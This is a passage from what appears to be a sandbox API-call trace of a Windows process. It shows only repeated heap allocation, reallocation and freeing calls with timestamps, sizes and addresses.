GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x622000, Size=0x5df) returned 0x622300 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2f0) returned 0x622000 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x622000, Size=0x64f) returned 0x6228f0 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x328) returned 0x622f50 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x622f50, Size=0x6b9) returned 0x623290 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x35d) returned 0x623960 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x623960, Size=0x6cf) returned 0x623cd0 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x368) returned 0x6243b0 [0186.445] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6243b0, Size=0x741) returned 0x624730 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3a1) returned 0x624e90 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x624e90, Size=0x757) returned 0x625250 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3ac) returned 0x624e90 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x624e90, Size=0x79d) returned 0x6259c0 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3cf) returned 0x626170 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x626170, Size=0x7af) returned 0x626550 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3d8) returned 0x626d10 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x626d10, Size=0x7bd) returned 0x627100 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3df) returned 0x626d10 [0186.446] GetProcessHeap () returned 0x560000 [0186.446] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x626d10, Size=0x7eb) returned 0x6278d0 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3f6) returned 0x6280d0 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6280d0, Size=0x80d) returned 0x6284e0 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x407) returned 0x628d00 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x628d00, Size=0x823) returned 0x629120 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x412) returned 0x629960 [0186.447] GetProcessHeap () returned 0x560000 [0186.447] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x629960, Size=0x82d) returned 0x629d90 [0186.449] GetProcessHeap () returned 0x560000 [0186.449] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x417) returned 0x629960 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x629960, Size=0x83f) returned 0x62a5d0 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x420) returned 0x629960 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x629960, Size=0x84d) returned 0x62ae20 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x427) returned 0x62b680 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62b680, Size=0x853) returned 0x62bac0 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x42a) returned 0x62b680 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62b680, Size=0x857) returned 0x62c330 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x42c) returned 0x62b680 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62b680, Size=0x883) returned 0x62cba0 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x442) returned 0x62d440 [0186.450] GetProcessHeap () returned 0x560000 [0186.450] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62d440, Size=0x889) returned 0x62d8a0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x445) returned 0x62d440 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62d440, Size=0x89d) returned 0x62e140 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x44f) returned 0x62d440 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62d440, Size=0x8e5) returned 0x62e9f0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x473) returned 0x62f2f0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x913) returned 0x631040 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x48a) returned 0x62f2f0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x947) returned 0x631970 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4a4) returned 0x62f2f0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x977) returned 0x6322d0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4bc) returned 0x62f2f0 [0186.451] GetProcessHeap () returned 0x560000 [0186.451] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x981) returned 0x632c60 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4c1) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x98f) returned 0x633600 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4c8) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x999) returned 0x633fa0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4cd) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xa2f) returned 0x634950 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x518) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xae3) returned 0x635390 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x572) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xaed) returned 0x635e90 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x577) returned 0x62f2f0 [0186.452] GetProcessHeap () returned 0x560000 [0186.452] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xaff) returned 0x636990 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x580) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xb09) returned 0x6374a0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x585) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xb6b) returned 0x637fc0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5b6) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xb81) returned 0x638b40 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5c1) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xb8b) returned 0x6396e0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5c6) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xbeb) returned 0x63a280 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5f6) returned 0x62f2f0 [0186.453] GetProcessHeap () returned 0x560000 [0186.453] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xc83) returned 0x63ae80 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x642) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xc87) returned 0x63bb20 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x644) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xcd1) returned 0x63c7c0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x669) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xd0b) returned 0x63d4b0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x686) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xd15) returned 0x63e1d0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x68b) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xd57) returned 0x63ef00 [0186.454] GetProcessHeap () returned 0x560000 [0186.454] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6ac) returned 0x62f2f0 [0186.454] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xda5) returned 0x63fc70 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6d3) returned 0x62f2f0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xde1) returned 0x642040 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6f1) returned 0x62f2f0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xdef) returned 0x642e40 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6f8) returned 0x62f2f0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xe8b) returned 0x643c40 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x746) returned 0x62f2f0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xf3d) returned 0x644ae0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x79f) returned 0x62f2f0 [0186.455] GetProcessHeap () returned 0x560000 [0186.455] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xf73) returned 0x645a30 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7ba) returned 0x62f2f0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xfc5) returned 0x6469c0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7e3) returned 0x62f2f0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xfd7) returned 0x6479a0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7ec) returned 0x62f2f0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0xfef) returned 0x648990 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7f8) returned 0x62f2f0 [0186.456] GetProcessHeap () returned 0x560000 [0186.456] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x100d) returned 0x649990 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x807) returned 0x62f2f0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x101f) returned 0x64a9b0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x810) returned 0x62f2f0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x102d) returned 0x64b9e0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x817) returned 0x62f2f0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x1037) returned 0x64ca20 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x81c) returned 0x62f2f0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x103d) returned 0x64da70 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x81f) returned 0x62f2f0 [0186.457] GetProcessHeap () returned 0x560000 [0186.457] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x1041) returned 0x64eac0 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x821) returned 0x62f2f0 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x10cf) returned 0x64fb20 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x868) returned 0x62f2f0 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x112f) returned 0x650c00 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x898) returned 0x62f2f0 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x11b7) returned 0x653040 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8dc) returned 0x62f2f0 [0186.458] GetProcessHeap () returned 0x560000 [0186.458] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x1213) returned 0x654210 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x90a) returned 0x62f2f0 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x62f2f0, Size=0x12b1) returned 0x655440 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x654210 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653040 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x650c00 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64fb20 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64eac0 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64da70 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64ca20 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64b9e0 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x64a9b0 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x649990 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x648990 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6479a0 | out: hHeap=0x560000) returned 1 [0186.459] GetProcessHeap () returned 0x560000 [0186.459] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6469c0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x645a30 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x644ae0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x643c40 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x642e40 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x642040 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63fc70 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63ef00 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63e1d0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63d4b0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63c7c0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63bb20 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63ae80 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x63a280 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6396e0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x638b40 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x637fc0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6374a0 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.460] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x636990 | out: hHeap=0x560000) returned 1 [0186.460] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x635e90 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x635390 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x634950 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x633fa0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x633600 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x632c60 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6322d0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x631970 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x631040 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62e9f0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62e140 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62d8a0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62cba0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62c330 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62bac0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62ae20 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x62a5d0 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.461] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x629d90 | out: hHeap=0x560000) returned 1 [0186.461] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x629120 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6284e0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6278d0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x627100 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x626550 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6259c0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: 